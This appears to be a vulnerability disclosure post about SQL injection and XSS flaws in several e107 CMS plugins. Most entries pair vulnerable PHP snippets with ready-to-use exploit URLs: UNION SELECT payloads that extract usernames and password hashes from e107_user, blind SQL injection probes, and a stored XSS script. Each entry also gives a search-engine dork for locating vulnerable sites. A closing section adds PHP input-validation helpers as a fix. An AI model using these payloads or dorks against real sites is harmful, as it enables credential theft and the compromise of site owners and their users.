roll_mini v1.2

XSS: /roll.php
PHP:
    if ($_GET['cat']) $id_cat = $_GET['cat'];
    else $id_cat = "1";
Example:
Code:
    http://e107/e107_plugins/roll_mini/roll.php?cat=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Administrator rights required. SQL injection: /roll.php
PHP:
    if ($_GET['cat']) $id_cat = $_GET['cat'];
    else $id_cat = "1";
    if ($_GET['add']) $add = $_GET['add'];
    if ($_GET['edit']) $edit = $_GET['edit'];
    if ($_GET['card_id']) $card_id = $_GET['card_id'];
    if ($_GET['index_name']) $index_name = $_GET['index_name'];
    if ($_GET['search']) $search = $_GET['search'];
    if ($_GET['page']) { $page = $_GET['page']; } else { $page = 1; }
Further down, these variables go straight into database queries. Nothing is filtered.
Example:
Code:
    http://e107/e107_plugins/roll_mini/roll.php?cat=%3Cscript%3Ealert(document.cookie)%3C/script%3E&card_id=-1%20union%20select%201,2,concat_ws(0x3a,user_name,user_password),4,5,6%20from%20e107_user&edit=1
Path: http://e107/e107_plugins/roll_mini/search.php
Dork: inurl:e107_plugins/roll_mini/
Locator v1.2

Administrator rights required. SQL injection: /admin_countries.php
PHP:
    $sql -> db_Select(DB_TABLE_LOCATOR_COUNTRY, "*", "locator_country_id=".$_GET['locator_country_id']);
Example:
Code:
    http://e107/e107_plugins/locator/admin_countries.php?edit_country=1&locator_country_id=1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4%20from%20e107_user--

Administrator rights required. SQL injection: /admin_categories.php
PHP:
    $sql -> db_Select(DB_TABLE_LOCATOR_TABLE, "*", "locator_cat_id=".$_GET['locator_cat_id']);
Example:
Code:
    http://e107/e107_plugins/locator/admin_categories.php?edit_category=1&locator_cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11--
There is plenty more buggy code in the admin area.
Dork: inurl:e107_plugins/locator/
League Version 1.04

SQL injection: /lique.php
PHP:
    ...
    if($_GET['Saison']){$Saison=$_GET['Saison'];}
    ...
    $query[0]="lique_games";
    $query[1]="*";
    $query[2]="games_home_id=".$pref['lique_my_team']." AND games_saison_id=".$Saison.
              " AND games_date<".$A=(time()-86400)." AND games_date>".(time()-604500).
              " OR games_gast_id=".$pref['lique_my_team']." AND games_date<".$A=(time()-86400).
              " AND games_date>".(time()-604500)." ORDER BY games_date ";
    ...
Example:
Code:
    http://e107/e107_plugins/lique/lique.php?Saison=-2%20union%20select%201,concat_ws%280x3a,user_name,user_password%29,3,4,5%20from%20e107_user--

Blind SQL injection: /scorer.php
PHP:
    ...
    if($_GET['Saison']){$Saison=$_GET['Saison'];}else{$Saison=$pref['lique_my_saison'];}
    if($_GET['team']){$team=$_GET['team'];}else{$team=$pref['lique_my_team'];}
    $z['games']=0;
    $sql -> db_Select("lique_games", "*", "games_home_id=".$team." OR games_gast_id=".$team." ");
    while($row = $sql-> db_Fetch()){ $z['games']++; }
    $qry1=" SELECT m.*, me.* FROM ".MPREFIX."lique_liga AS m LEFT JOIN ".MPREFIX."lique_teams AS me ON me.team_id=m.liga_team_id WHERE m.liga_id ='".$team."' ";
    $sql->db_Select_gen($qry1);
    $row = $sql-> db_Fetch();
    $team_ID=$row['team_id'];
    $team_Name=$row['team_name'];
    $team_admin=$row['team_admin_id'];
    $team_url=$row['team_url'];
    $team_icon=$row['team_icon'];
    $team_description=$row['team_description'];
    $z['players']=0;
    $sql -> db_Select("lique_roster", "*", "roster_team_id=".$team."");
    while($row = $sql-> db_Fetch()){ $z['players']++; }
    ...
Example:
Code:
    http://e107/e107_plugins/lique/scorer.php?team=1%20and%20substring%28@@version,1,1%29=5

Blind SQL injection: /strafen.php
PHP: the same code as in scorer.php above (the $Saison/$team handling and all three queries are identical).
Example:
Code:
    http://e107/e107_plugins/lique/strafen.php?team=1%20and%20substring%28@@version,1,1%29=5
And plenty more bugs besides...
Dork: inurl:e107_plugins/lique/
AACGC MOH Stats V1.0

SQL injection: /Member_Details.php
PHP:
    ...
    if (e_QUERY) {
        $tmp = explode('.', e_QUERY);
        $action = $tmp[0];
        $sub_action = $tmp[1];
        $id = $tmp[2];
        unset($tmp);
    }
    ...
    $sql ->db_Select("user_extended", "*", "WHERE user_extended_id=$sub_action","");
    $row = $sql->db_Fetch();
    $sql2 ->db_Select("user", "*", "WHERE user_id='".$row['user_extended_id']."'","");
    ...
Example:
Code:
    http://e107/e107_plugins/aacgc_mohstats/Member_Details.php?det.2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
Dork: inurl:e107_plugins/aacgc_mohstats/
Userclass Images v09 Beta

Administrator rights required. SQL injection: /admin.php
PHP:
    ...
    $q = "SELECT * FROM ".MPREFIX."userclass_images WHERE userclass_id='$_POST[uid]'";
    ...
EveryPage v1.0

Administrator rights required. SQL injection: /admin_config.php
PHP:
    ...
    $query = "ep_text='". $_POST['code'] ."' WHERE ep_id='". $_POST['id'] ."'";
    ...
Prayer Request Menu Version 2.5

Active XSS: /prayers.php
PHP:
    ...
    $_POST['prayer_name'];
    $_POST['prayer_body'];
    ...
The variables listed above are not filtered in any way, which gives us an active (stored) XSS. Open the page http://e107/e107_plugins/prayer_menu/prayers.php?0.submit.0.0.0 and add a comment containing "<script>alert(111)</script>" in the "Title and Prayer Request" forms.
Dork: inurl:e107_plugins/prayer_menu/
P.S. I did this with administrator rights, so I can't vouch for how it behaves for mere mortal users.
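The defect is the same in every entry above: a raw $_GET/$_POST value (or a piece of e_QUERY) is concatenated straight into db_Select or echoed back into the page. The following is an added example, not code from the post or from any of the e107 plugins listed; it puts that shape beside a hardened form. The $sql->db_Select(table, fields, where) call and DB_TABLE_LOCATOR_COUNTRY are taken from the snippets on the page; read_int_param, hardened_lookup, safe_cat_for_html and safe_text_for_html are hypothetical helper names.

```php
<?php
// Vulnerable shape, as in locator/admin_countries.php: the WHERE clause is
// built from $_GET verbatim, so "1 union select ..." becomes part of the query.
function vulnerable_lookup($sql) {
    return $sql->db_Select(DB_TABLE_LOCATOR_COUNTRY, "*",
        "locator_country_id=" . $_GET['locator_country_id']);
}

// Accept only a plain decimal id; anything else falls back to $default.
// Works for $_GET/$_POST and for the exploded e_QUERY array used by
// Member_Details.php (pass the array and the numeric index as $name).
function read_int_param(array $src, $name, $default, $min = 1) {
    if (!isset($src[$name]) || !preg_match('/^\d{1,10}\z/', (string) $src[$name])) {
        return $default;
    }
    $v = (int) $src[$name];
    return $v >= $min ? $v : $default;
}

// Hardened lookup: the id is an integer before it reaches SQL, so the
// WHERE clause can only ever be "locator_country_id=<digits>".
function hardened_lookup($sql, array $get) {
    $id = read_int_param($get, 'locator_country_id', 0);
    if ($id === 0) {
        return false;            // no usable id: do not run the query at all
    }
    return $sql->db_Select(DB_TABLE_LOCATOR_COUNTRY, "*", "locator_country_id=" . $id);
}

// roll.php reflects ?cat= into the page (the XSS entry): constrain it to an
// integer like the other ids and entity-escape whatever is echoed.
function safe_cat_for_html(array $get) {
    $cat = read_int_param($get, 'cat', 1);   // roll.php defaults cat to "1"
    return htmlspecialchars((string) $cat, ENT_QUOTES, 'UTF-8');
}

// Free-text fields such as prayer_name/prayer_body (prayers.php) cannot be
// cast to int: bound their length and escape them on output. On the way into
// the database they must go through the DB layer's quoting, never raw concat.
function safe_text_for_html(array $post, $name, $maxlen = 2000) {
    $raw = isset($post[$name]) ? (string) $post[$name] : '';
    $raw = mb_substr($raw, 0, $maxlen);      // mbstring assumed available
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
```

With these helpers a request such as locator_country_id=1%20union%20select... is rejected before any query runs, and cat=%3Cscript%3E is reduced to the default "1".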